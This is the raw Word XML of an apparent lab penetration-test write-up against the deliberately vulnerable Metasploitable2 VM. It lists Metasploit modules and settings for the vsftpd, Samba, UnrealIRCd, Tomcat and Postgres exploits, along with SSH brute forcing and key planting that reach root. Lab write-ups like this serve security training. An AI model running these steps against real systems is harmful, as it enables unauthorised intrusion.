      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42DE331E" w14:textId="586AECDA" w:rsidR="00D76D9B" w:rsidRDefault="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc155025651" w:history="1">
        <w:r w:rsidRPr="00E7325C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>GVM report</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155025651 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10CD22BF" w14:textId="615BD28C" w:rsidR="00242AF9" w:rsidRPr="00242AF9" w:rsidRDefault="00012388" w:rsidP="00242AF9">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF7CA24" w14:textId="7D42F572" w:rsidR="00460C48" w:rsidRDefault="00460C48" w:rsidP="00050E8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc155025635"/>
      <w:r>
        <w:t>Resources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>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2" w:name="_Toc155025636"/>
      <w:r w:rsidRPr="00460C48">
        <w:t>Web references</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00460C48">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDA9014" w14:textId="1192DBDF" w:rsidR="00460C48" w:rsidRPr="00460C48" w:rsidRDefault="00894A1A" w:rsidP="00460C48">
      <w:hyperlink r:id="rId5"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61D62DE6" w14:textId="5F70AECD" w:rsidR="00460C48" w:rsidRPr="00460C48" w:rsidRDefault="00894A1A" w:rsidP="00460C48">
      <w:hyperlink r:id="rId6"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294805E0" w14:textId="36BB5611" w:rsidR="00460C48" w:rsidRDefault="00460C48" w:rsidP="00460C48">
      <w:r>
        <w:t>Additional information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1EC1F9" w14:textId="21FBFBA4" w:rsidR="00460C48" w:rsidRDefault="00894A1A" w:rsidP="00460C48">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00460C48" w:rsidRPr="00460C48">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Metasploitable2-Linux.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00460C48" w:rsidRPr="00460C48">
        <w:t xml:space="preserve"> – A GVM scan with </w:t>
      </w:r>
      <w:r w:rsidR="00460C48">
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="00460C48" w:rsidRPr="00460C48">
        <w:t xml:space="preserve"> regarding the detected issues   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8E8108" w14:textId="4F52FE4D" w:rsidR="00460C48" w:rsidRDefault="00460C48" w:rsidP="00460C48">
      <w:r>
        <w:t>This report also contains details from ZAP when looking at Port 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765ADA40" w14:textId="0C4BF9C7" w:rsidR="00050E8D" w:rsidRDefault="00050E8D" w:rsidP="00050E8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc155025637"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Running netdiscover</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>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launch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lastRenderedPageBreak/>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11044E1B" w:rsidR="00A55419" w:rsidRDefault="0053065B" w:rsidP="00460C48">
      <w:r w:rsidRPr="0053065B">
        <w:t xml:space="preserve">From the msf6 command prompt run sudo netdiscover -r 192.168.254.1/16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9"/>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lastRenderedPageBreak/>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-eth0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27938C20" w14:textId="357B3A74" w:rsidR="00E01F34" w:rsidRDefault="009E78F3" w:rsidP="009E78F3">
      <w:r>
        <w:t xml:space="preserve">-O will try to </w:t>
      </w:r>
      <w:r w:rsidR="0052288E">
        <w:t>identify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the OS running on the target.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A12B48" w14:textId="77777777" w:rsidR="0052288E" w:rsidRDefault="0052288E" w:rsidP="009E78F3"/>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A7EDB07" w14:textId="7650DDC2" w:rsidR="00D308AE" w:rsidRDefault="00D308AE" w:rsidP="00D308AE">
      <w:r>
        <w:t>A few things to note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298871F" w14:textId="77777777" w:rsidR="00D76D9B" w:rsidRDefault="00D308AE" w:rsidP="00D76D9B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc155025638"/>
      <w:r>
        <w:t>Port 1524</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>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lastRenderedPageBreak/>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4A67ECFA" w14:textId="77777777" w:rsidR="00E17435" w:rsidRDefault="00CA1453" w:rsidP="00E17435">
      <w:r w:rsidRPr="00CA1453">
        <w:t xml:space="preserve">Moreover, ports 513, 513, and 514 are open, known as "r" services if they are misconfigured, they could allow remote login.  These ports were also discovered within the GVM report available click here Metasploitable2-Linux.pdf for more </w:t>
      </w:r>
      <w:r>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D6320CC" w14:textId="0EEE21D5" w:rsidR="00A7228D" w:rsidRDefault="00A7228D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60949542" w14:textId="77777777" w:rsidR="00A7228D" w:rsidRDefault="00A7228D" w:rsidP="00E17435"/>
    <w:p w14:paraId="38B0A936" w14:textId="24C94AB5" w:rsidR="00BD308A" w:rsidRPr="008314C5" w:rsidRDefault="00BD308A" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc155025639"/>
      <w:r w:rsidRPr="008314C5">
        <w:t>Exploitng Port 21</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="008314C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C15165C" w14:textId="50786E6E" w:rsidR="00190C6A"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 xml:space="preserve">/ftp/vsftpd_234_backdoor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7"/>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8116CB6" w14:textId="15EB02EF" w:rsidR="007A5D93" w:rsidRDefault="007A5D93" w:rsidP="007A5D93">
      <w:r>
        <w:t xml:space="preserve">Verified access by </w:t>
      </w:r>
      <w:r w:rsidR="00E7387F">
        <w:t xml:space="preserve">running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E7387F">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24FC34F7" w14:textId="5DA65011" w:rsidR="00321109" w:rsidRDefault="00B867F4" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc155025640"/>
      <w:r>
        <w:t xml:space="preserve">Port 22 </w:t>
      </w:r>
      <w:r w:rsidR="00321109">
        <w:t>Exploiting Open SSH</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="49A5E98A" w14:textId="0EA2B887" w:rsidR="00321109" w:rsidRDefault="00C4744C" w:rsidP="007A5D93">
      <w:r>
        <w:t>A lot of dead links found.</w:t>
      </w:r>
      <w:r w:rsidR="001E05FC">
        <w:t xml:space="preserve"> But did find the CVE-2008-0166</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A30AA4" w14:textId="75242175" w:rsidR="00C4744C" w:rsidRDefault="001E05FC" w:rsidP="001E05FC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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3E2B6404" w14:textId="702AC1AB" w:rsidR="000828E0"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70220C7" w14:textId="30C8CA14" w:rsidR="00D316B5" w:rsidRDefault="00D316B5" w:rsidP="001563F3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc155025641"/>
      <w:r>
        <w:t>Port 80</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B06E99" w14:textId="77777777" w:rsidR="00D316B5" w:rsidRDefault="00D316B5" w:rsidP="00D316B5">
      <w:r>
        <w:t xml:space="preserve">What’s running on port 80?   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268FCA89" w14:textId="77777777" w:rsidR="00D316B5" w:rsidRDefault="00D316B5" w:rsidP="00D316B5">
      <w:r>
        <w:t xml:space="preserve">Default website   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7143333A" w14:textId="5452F95A" w:rsidR="00BB5E2C" w:rsidRDefault="00BB5E2C" w:rsidP="00BB5E2C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>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60959000" w14:textId="45961BBD" w:rsidR="00FB5467" w:rsidRDefault="00D316B5" w:rsidP="008314C5">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23"/>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24"/>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25"/>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26"/>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27"/>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28"/>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29"/>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30"/>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31"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32"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33"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34"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35"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36"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37"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38" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D80D9B">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C0DA4F" w14:textId="77777777" w:rsidR="008B708C" w:rsidRDefault="008B708C" w:rsidP="008B708C"/>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php_cgi_arg_injec</w:t>
      </w:r>
      <w:r w:rsidR="008B6AC2">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00A52060">
        <w:t>ion</w:t>
      </w:r>
      <w:proofErr w:type="spell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77777777" w:rsidR="007D2B9F" w:rsidRDefault="00433EE2" w:rsidP="007D2B9F">
      <w:r>
        <w:t xml:space="preserve">Was able to move around the Filing system </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>butr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as you see I could get to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file for root.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D8879E" w14:textId="312294A9" w:rsidR="00C02EC4" w:rsidRDefault="00C02EC4" w:rsidP="006A7485">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc155025642"/>
      <w:r>
        <w:t>Po</w:t>
      </w:r>
      <w:r w:rsidR="006A7485">
        <w:t>rt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 445</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="17C0DFB1" w14:textId="05F3615F" w:rsidR="00BA7D80" w:rsidRDefault="009337A3" w:rsidP="009337A3">
      <w:r>
        <w:t>Run the following in Metasploit download the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319CAC0E" w14:textId="4638BAC1" w:rsidR="002F7A99" w:rsidRDefault="007E20E5" w:rsidP="007D2B9F">
      <w:r>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidR="002F7A99" w:rsidRPr="002F7A99">
        <w:t>exploit/multi/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F7A99" w:rsidRPr="002F7A99">
        <w:t>usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F7A99" w:rsidRPr="002F7A99">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F7A99" w:rsidRPr="002F7A99">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C1922A" w14:textId="0AD3F9F5" w:rsidR="00BA7D80" w:rsidRDefault="002F7A99" w:rsidP="007D2B9F">
      <w:r w:rsidRPr="002F7A99">
        <w:lastRenderedPageBreak/>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Now let’s revisit the SSH issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1082B18A" w14:textId="383D37AE" w:rsidR="00461B33" w:rsidRDefault="00461B33" w:rsidP="00461B33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc155025643"/>
      <w:r>
        <w:t>Revisit SSH</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>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run  cat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45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1976930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A83105D" w14:textId="40B73836" w:rsidR="00101BC7" w:rsidRDefault="00101BC7" w:rsidP="00101BC7">
      <w:r>
        <w:t xml:space="preserve">The last error is expected because I don’t have a key.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lastRenderedPageBreak/>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To plant your private keys on the remote machine, you'll need write access to the target user's home directory. You'll generate a public SSH key from the a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run  ssh login brute force </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C16194" w14:textId="77777777" w:rsidR="00FB3914" w:rsidRDefault="00101BC7" w:rsidP="00FB3914">
      <w:r>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ssh_login_pubkey</w:t>
      </w:r>
      <w:proofErr w:type="spell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lastRenderedPageBreak/>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&gt; set USERNAME root USERNAME =&gt; root  auxiliary(</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37047FEA" w14:textId="793331F2" w:rsidR="005231AC" w:rsidRDefault="005231AC" w:rsidP="005231AC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc155025644"/>
      <w:r>
        <w:t>Brute force ssh</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="6323C893" w14:textId="77777777" w:rsidR="005231AC" w:rsidRPr="005231AC" w:rsidRDefault="005231AC" w:rsidP="005231AC"/>
    <w:p w14:paraId="7C01CFCD" w14:textId="6D1DE19E" w:rsidR="00D159D6" w:rsidRDefault="005231AC" w:rsidP="005B2E1D">
      <w:r w:rsidRPr="005231AC">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r>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D26F8EB" w14:textId="282BED93" w:rsidR="001B7057" w:rsidRDefault="001B7057" w:rsidP="00101BC7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I re-ran and I was able to brute force the root to using the same </w:t>
      </w:r>
      <w:r w:rsidR="00894A1A">
        <w:t>method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C20A8" w14:textId="77777777" w:rsidR="001B7057" w:rsidRDefault="001B7057" w:rsidP="00101BC7"/>
    <w:p w14:paraId="6A1012C2" w14:textId="7CF980E0" w:rsidR="007D2B9F" w:rsidRPr="008314C5" w:rsidRDefault="007D2B9F" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc155025645"/>
      <w:r w:rsidRPr="008314C5">
        <w:t>Port 8180</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="09E9D642" w14:textId="639B0B39" w:rsidR="007D2B9F" w:rsidRDefault="007D2B9F" w:rsidP="007D2B9F">
      <w:r>
        <w:t xml:space="preserve">First let’s see what’s running on 8180   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE730BF" w14:textId="1344A65A" w:rsidR="007D2B9F" w:rsidRDefault="000F091D" w:rsidP="007D2B9F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>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 xml:space="preserve">(CVE  2007-2447):http://www.cvedetails.com/cve/cve-2007-2447  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00702C8E" w14:textId="64C5784F" w:rsidR="000F091D" w:rsidRDefault="00741970" w:rsidP="00741970">
      <w:r>
        <w:t>use exploit/multi/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tomcat_mgr_deploy</w:t>
      </w:r>
      <w:proofErr w:type="spell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48"/>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tomcat </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3760FB50" w14:textId="77777777" w:rsidR="00062B58" w:rsidRDefault="00062B58" w:rsidP="00062B58">
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tomcat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF2CC9E" w14:textId="51C28973" w:rsidR="00062B58" w:rsidRDefault="00062B58" w:rsidP="00062B58">
      <w:r>
        <w:t xml:space="preserve">set  RHOST 192.168.254.186 set  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398CB5C5" w14:textId="4FA0C148" w:rsidR="00062B58" w:rsidRDefault="00062B58" w:rsidP="00062B58">
      <w:r>
        <w:t xml:space="preserve">RPORT 8180   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57820499" w14:textId="1E66B926" w:rsidR="00062B58" w:rsidRDefault="00AB4A6A" w:rsidP="00062B58">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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77F279B1" w14:textId="77777777" w:rsidR="007A110C" w:rsidRDefault="007A110C" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc155025646"/>
      <w:r>
        <w:t>Port 5432</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452F3AE1" w14:textId="2C336720" w:rsidR="00C107DA" w:rsidRDefault="007A110C" w:rsidP="007A110C">
      <w:r>
        <w:t xml:space="preserve">Because the port is open, I did try a different hack, this worked and got me into the same </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loca</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on  use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgres_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3706DDC9" w14:textId="77777777" w:rsidR="00252A5D" w:rsidRDefault="00252A5D" w:rsidP="007A110C"/>
    <w:p w14:paraId="5746B705" w14:textId="7D332CA3" w:rsidR="00062B58" w:rsidRDefault="00252A5D" w:rsidP="00384326">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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54"/>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using :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host  set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lastRenderedPageBreak/>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55"/>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56"/>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postgres   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F275BF" w14:textId="23C80369" w:rsidR="00313769" w:rsidRDefault="00313769" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc155025647"/>
      <w:r w:rsidRPr="00313769">
        <w:t>Port 23</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidRPr="00313769">
        <w:t xml:space="preserve">  </w:t>
      </w:r>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r>
        <w:t xml:space="preserve">set  RHOST  192.168.254.186  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24929312" w14:textId="71555DAF" w:rsidR="00792A92" w:rsidRDefault="009A65C2" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc155025648"/>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00792A92">
        <w:t>ort 1099</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidR="00792A92">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFD07DA" w14:textId="7B345ECA" w:rsidR="00792A92" w:rsidRDefault="00792A92" w:rsidP="00792A92">
      <w:r>
        <w:t>use  exploit/multi/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2A1886DB" w14:textId="1D317C28" w:rsidR="00D93FF2" w:rsidRDefault="0011222E" w:rsidP="0011222E">
      <w:r w:rsidRPr="0011222E">
        <w:t xml:space="preserve">run   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458BFFBF" w14:textId="26DF10EA" w:rsidR="00DF50CE" w:rsidRDefault="00DF50CE" w:rsidP="0011222E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5698A245" wp14:editId="32BE2FA7">
            <wp:extent cx="5731510" cy="1364948"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1157" name="Picture 1157"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57" name="Picture 1157" descr="A computer screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1364948"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>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F69CBB4" w:rsidR="008E1FB7" w:rsidRDefault="008E1FB7" w:rsidP="008E1FB7">
      <w:r w:rsidRPr="008E1FB7">
        <w:t xml:space="preserve">This time connected as root </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31017171" w14:textId="34D22849" w:rsidR="001563F3" w:rsidRDefault="001563F3" w:rsidP="001563F3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc155025649"/>
      <w:r>
        <w:t>Port 5900</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>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60"/>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61"/>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62"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63"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pass_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserv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65"/>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77777777" w:rsidR="00620BAC" w:rsidRDefault="00620BAC" w:rsidP="001563F3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc155025650"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BackDoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> v3.2.8.1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r>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 xml:space="preserve">/unreal_ircd_3281_backdoor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67"/>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r w:rsidRPr="00EF6A43">
        <w:t>Lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF6A43">
        <w:t xml:space="preserve">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r w:rsidRPr="005725A9">
        <w:t>harrybrown</w:t>
      </w:r>
      <w:proofErr w:type="spell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210FCC48" w14:textId="77777777" w:rsidR="00F05F95" w:rsidRDefault="00F05F95" w:rsidP="001563F3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc155025651"/>
      <w:r>
        <w:t>GVM report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017558C1" w14:textId="44065B81" w:rsidR="00F05F95" w:rsidRPr="00F05F95" w:rsidRDefault="00F05F95" w:rsidP="00F05F95">
      <w:r w:rsidRPr="00F05F95">
        <w:t xml:space="preserve">GVM recorked 36 possible CVE issues to </w:t>
      </w:r>
      <w:r w:rsidR="00B33A9D">
        <w:t>investi</w:t>
      </w:r>
      <w:r w:rsidR="00B33A9D" w:rsidRPr="00F05F95">
        <w:t>gate</w:t>
      </w:r>
      <w:r w:rsidRPr="00F05F95">
        <w:t xml:space="preserve">.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4654FE73" w14:textId="77777777" w:rsidR="00F05F95" w:rsidRDefault="00F05F95" w:rsidP="00F05F95">
      <w:pPr>
        <w:spacing w:after="47"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="695E9006" wp14:editId="6BC82B84">
            <wp:extent cx="5734812" cy="1520952"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1560" name="Picture 156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60" name="Picture 1560" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734812" cy="1520952"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B2576C" w14:textId="77777777" w:rsidR="00F05F95" w:rsidRDefault="00F05F95" w:rsidP="00F05F95">
      <w:pPr>
        <w:spacing w:after="84"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D0954F" w14:textId="77777777" w:rsidR="00F05F95" w:rsidRDefault="00F05F95" w:rsidP="00F05F95">
      <w:pPr>
        <w:spacing w:after="41"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="793A5206" wp14:editId="4D699FBF">
            <wp:extent cx="5734812" cy="2313432"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1562" name="Picture 156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62" name="Picture 1562" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
